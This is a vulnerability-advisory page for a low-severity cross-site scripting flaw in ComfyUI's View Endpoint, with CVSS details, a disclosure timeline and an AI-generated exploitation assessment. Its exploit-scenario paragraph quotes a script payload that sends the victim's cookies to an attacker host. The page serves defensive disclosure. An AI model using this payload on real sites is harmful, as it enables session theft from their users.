Skip to main content

Comfyui EUVD-2026-23739

| CVE-2026-6593 LOW
Cross-site Scripting (XSS) (CWE-79)
2026-04-20 VulDB GHSA-643x-95vv-2wf6
XSS Comfyui
2.0
CVSS 4.0 · NVD

Severity by source

NVD PRIMARY
2.0 LOW
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
P
Scope
X

Lifecycle Timeline

9
Severity Changed
Apr 29, 2026 - 01:12 NVD
MEDIUM LOW
CVSS changed
Apr 29, 2026 - 01:12 NVD
5.1 (MEDIUM) 2.0 (LOW)
PoC Detected
Apr 29, 2026 - 01:00 vuln.today
Public exploit code
Severity Changed
Apr 20, 2026 - 02:22 NVD
LOW MEDIUM
CVSS changed
Apr 20, 2026 - 02:22 NVD
3.5 (LOW) 5.1 (MEDIUM)
Analysis Generated
Apr 20, 2026 - 02:04 vuln.today
EUVD ID Assigned
Apr 20, 2026 - 02:00 euvd
EUVD-2026-23739
Analysis Generated
Apr 20, 2026 - 02:00 vuln.today
CVE Published
Apr 20, 2026 - 01:30 nvd
LOW 2.0

DescriptionCVE.org

A vulnerability was found in ComfyUI up to 0.13.0. Affected by this issue is some unknown functionality of the file server.py of the component View Endpoint. Performing a manipulation results in cross site scripting. The attack is possible to be carried out remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.

AnalysisAI

Cross-site scripting (XSS) in ComfyUI up to version 0.13.0 allows authenticated remote attackers to inject malicious scripts through the View Endpoint in server.py, affecting user integrity with publicly available exploit code. The vulnerability requires user interaction (UI:R) and authenticated access (PR:L), limiting its severity despite network accessibility. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Authenticate to ComfyUI
Delivery
Craft malicious View Endpoint payload
Exploit
Store or share payload
Install
Victim navigates to endpoint
C2
Browser parses unsanitized HTML
Execute
JavaScript executes in victim context
Impact
Attacker harvests session/data
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Exploitation requires: (1) Authenticated access to ComfyUI (PR:L) - the attacker or a collaborator must have a valid login account; (2) User interaction (UI:R) - the victim must click a link or view a page containing the malicious payload, either directly or by navigating to an attacker-controlled project or shared resource; (3) The View Endpoint must be enabled and accessible (typical default configuration); (4) The victim's browser must execute JavaScript (no special browser extensions or protections disabling scripts). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Despite the low CVSS score of 3.5, this vulnerability carries moderate practical risk due to public exploit availability and authenticated access requirements. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An authenticated ComfyUI user logs into a shared ComfyUI instance. The attacker crafts a malicious URL or parameter containing JavaScript code (e.g., by manipulating the View Endpoint with a payload like <script>fetch('http://attacker.com/steal?cookie='+document.cookie)</script>) and shares it via social engineering or stores it in a project file. …
Remediation No vendor-released patch has been identified at time of analysis, as ComfyUI's maintainers did not respond to early disclosure. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-23739 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy